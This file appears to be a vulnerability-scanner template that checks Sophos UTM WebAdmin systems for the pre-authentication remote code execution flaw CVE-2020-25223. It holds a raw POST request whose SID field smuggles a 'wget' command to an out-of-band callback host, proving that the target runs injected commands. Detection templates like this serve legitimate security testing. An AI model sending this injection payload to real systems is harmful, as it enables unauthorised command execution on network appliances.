46 lines
1.7 KiB
YAML
46 lines
1.7 KiB
YAML
id: CVE-2020-25223
|
|
|
|
info:
|
|
name: Sophos UTM Preauth Remote Code Execution
|
|
author: gy741
|
|
severity: critical
|
|
description: Sophos SG UTMA WebAdmin is susceptible to a remote code execution vulnerability in versions before v9.705 MR5, v9.607 MR7, and v9.511 MR11.
|
|
reference:
|
|
- https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223
|
|
- https://community.sophos.com/b/security-blog/posts/advisory-resolved-rce-in-sg-utm-webadmin-cve-2020-25223
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-25223
|
|
- https://community.sophos.com/b/security-blog
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2020-25223
|
|
tags: cve,cve2020,sophos,rce,oast,unauth,cisa
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST /var HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: text/javascript, text/html, application/xml, text/xml, */*
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
X-Requested-With: XMLHttpRequest
|
|
X-Prototype-Version: 1.5.1.1
|
|
Content-Type: application/json; charset=UTF-8
|
|
Origin: {{BaseURL}}
|
|
Connection: close
|
|
Referer: {{BaseURL}}
|
|
Sec-Fetch-Dest: empty
|
|
Sec-Fetch-Mode: cors
|
|
Sec-Fetch-Site: same-origin
|
|
|
|
{"objs": [{"FID": "init"}], "SID": "|wget http://{{interactsh-url}}|", "browser": "gecko_linux", "backend_version": -1, "loc": "", "_cookie": null, "wdebug": 0, "RID": "1629210675639_0.5000855117488202", "current_uuid": "", "ipv6": true}
|
|
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
|
words:
|
|
- "http"
|
|
|
|
# Enhanced by mp on 2022/03/27
|